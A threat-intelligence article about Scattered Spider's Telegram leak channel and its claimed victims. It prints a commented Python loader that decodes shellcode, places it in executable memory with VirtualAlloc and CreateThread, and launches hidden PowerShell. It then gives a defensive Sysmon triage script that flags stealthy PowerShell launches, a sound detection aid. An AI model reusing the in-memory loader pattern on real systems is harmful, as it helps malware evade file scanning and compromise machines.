In early August 2025, a previously quiet cybercrime collective known as Scattered Spider resurfaced with a striking new Telegram channel that aggregates proof of its intrusions and data exfiltration operations.
The channel name fuses ShinyHunters, Scattered Spider, and Lapsus$, signaling a collaboration—or at least a shared brand—among several prolific extortion groups.
Within hours of its launch, the channel published screenshots of console access to Victoria’s Secret, a 100-entry customer data sample from Gucci, and lists of sellable databases from Neiman Marcus and Chanel.
DataBreaches analysts noted that this amalgamated channel has evolved beyond simple leak announcements into an almost real-time marketplace for stolen credentials and corporate documents.
Scattered Spider’s emergence as a public aggregator of multiple ransomware and data theft campaigns marks a departure from its earlier, more clandestine operations.
Historically, leak channels would post a single statement followed by a download link or sales instructions. In contrast, the new channel intersperses partial data dumps, “HMU if interested” sales pitches, memes, and direct threats to entities like the U.K. Ministry of Justice.
DataBreaches researchers identified scripts posted by the group for enumerating GitHub repositories belonging to the Legal Aid Agency.
This blend of proof and propaganda creates a sense of both transparency and terror.
The channel’s rapid revelations caused immediate alarm across industries. High-value targets including Disney, S&P Global, T-Mobile, Nvidia, Otelier, Coinbase, Burger King Brazil, Adidas, and Cisco were all named, with some incidents tying back to earlier Snowflake and Salesforce campaign leaks.
Government bodies did not escape: the U.S. Department of Homeland Security appeared in multiple posts displaying directory listings of servers, while screenshots hinted at negotiations over stolen court filings.
The channel’s frenetic pace and broad scope suggest Scattered Spider may be coordinating or rebranding data theft operations to maximize extortion leverage.
Infection Mechanism
Scattered Spider’s infection mechanism is multi-stage, beginning with spear-phishing and the use of compromised VPN credentials.
Initial access scripts—shared in obfuscated Python snippets—automate the deployment of Cobalt Strike beacons.
A typical snippet, reproduced below with explanatory comments added, is a loader that base64-decodes shellcode and runs it from memory rather than from a file on disk:
import ctypes, base64, subprocess
# The payload travels as base64 inside the script; the posted value is a placeholder.
shellcode = base64.b64decode("...==")
# Reserve a readable, writable, executable region: 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
ptr = ctypes.windll.kernel32.VirtualAlloc(None, len(shellcode), 0x3000, 0x40)
# Copy the decoded bytes into that region and start a thread at its first byte.
ctypes.memmove(ptr, shellcode, len(shellcode))
ctypes.windll.kernel32.CreateThread(None, 0, ptr, None, 0, None)
# Hand-off to PowerShell with no profile and a hidden window. Invoke-CobaltStrike is not a built-in cmdlet, so as printed this line is illustrative, not a working stage.
subprocess.call(["powershell", "-nop", "-w", "hidden", "-c", "Invoke-CobaltStrike"])
Because the payload is decoded and executed in memory, file-based antivirus scanning has no artifact on disk to inspect. It is not invisible to endpoint detection, though: a Python interpreter allocating a PAGE_EXECUTE_READWRITE region and starting a thread in it, then spawning PowerShell with -nop and -w hidden, is exactly the behavioral sequence EDR telemetry is built to surface.
Once the beacon is active, Scattered Spider escalates privileges through known Windows kernel vulnerabilities and then, within 48 hours of initial access, either deploys ransomware or exfiltrates data for sale.
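The loader above leaves two observables on the endpoint that are far easier to catch than the shellcode itself: python.exe spawning powershell.exe, and PowerShell launched with stealth switches. The following is an added example, not code from the article or from the group: a small triage routine run over constructed Sysmon Event ID 1 style process-creation records (the field names Image, ParentImage, CommandLine and ProcessId are Sysmon's; the sample events, process IDs and paths are made up). It resolves PowerShell's abbreviated switches to their full names, because -nop, -w hidden and -enc are accepted prefixes that a literal match on "-NoProfile" would miss.

```python
"""Behavioral triage of Sysmon-style process-creation events (added example)."""
import ntpath

SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Full switch names; powershell.exe accepts any unambiguous prefix (-nop, -w, -c ...).
PS_SWITCHES = ["noprofile", "nologo", "noninteractive", "noexit", "windowstyle",
               "encodedcommand", "executionpolicy", "command", "file", "version"]
# Documented short forms that a prefix match alone would not resolve.
PS_ALIASES = {"e": "encodedcommand", "ec": "encodedcommand", "ep": "executionpolicy"}


def resolve_switches(cmdline: str) -> dict:
    """Map each switch on a PowerShell command line to its full name and following token.

    Scanning stops at -Command/-EncodedCommand/-File: everything after those
    belongs to the payload, not to powershell.exe itself.
    """
    tokens = cmdline.split()
    found = {}
    for i, tok in enumerate(tokens[1:], start=1):  # tokens[0] is the image name
        if tok[0] not in "-/":
            continue
        name = tok[1:].lower()
        full = PS_ALIASES.get(name)
        if full is None:
            matches = [s for s in PS_SWITCHES if s.startswith(name)]
            full = matches[0] if len(matches) == 1 else None
        if full is None:
            continue
        found[full] = tokens[i + 1].lower() if i + 1 < len(tokens) else None
        if full in ("command", "encodedcommand", "file"):
            break
    return found


def reasons_for(event: dict) -> list:
    """Indicators present on one process-creation event (empty list if none)."""
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    reasons = []
    if image not in POWERSHELL:
        return reasons
    if parent in SCRIPT_HOSTS:
        reasons.append(f"spawned by script host {parent}")
    sw = resolve_switches(event["CommandLine"])
    if "noprofile" in sw:
        reasons.append("-NoProfile")
    if sw.get("windowstyle") == "hidden":
        reasons.append("-WindowStyle Hidden")
    if "encodedcommand" in sw:
        reasons.append("-EncodedCommand")
    if sw.get("executionpolicy") == "bypass":
        reasons.append("-ExecutionPolicy Bypass")
    return reasons


def triage(events) -> dict:
    """Return {ProcessId: (verdict, reasons)}; two or more indicators raise an alert,
    a single one (e.g. an admin's -NoProfile backup script) is queued for review."""
    out = {}
    for ev in events:
        r = reasons_for(ev)
        if r:
            out[ev["ProcessId"]] = ("alert" if len(r) >= 2 else "review", r)
    return out


# Constructed sample telemetry (hypothetical hosts, PIDs and paths).
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "ParentImage": r"C:\Users\jdoe\AppData\Local\Programs\Python\Python311\python.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c Invoke-CobaltStrike"},
    {"ProcessId": 2208,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"ProcessId": 3344,
     "ParentImage": r"C:\Python311\python.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
    {"ProcessId": 5016,
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ep bypass -enc SQBFAFgAIAAoAE4A"},
]

if __name__ == "__main__":
    for pid, (verdict, reasons) in triage(SAMPLE_EVENTS).items():
        print(f"{pid}: {verdict} ({', '.join(reasons)})")
```

The prefix resolution is the part worth keeping: detections written as substring matches on "-NoProfile" or "-EncodedCommand" are trivially sidestepped by the short forms the snippet already uses, while a resolver that mirrors PowerShell's own parsing treats -nop, -nopro and -NoProfile identically.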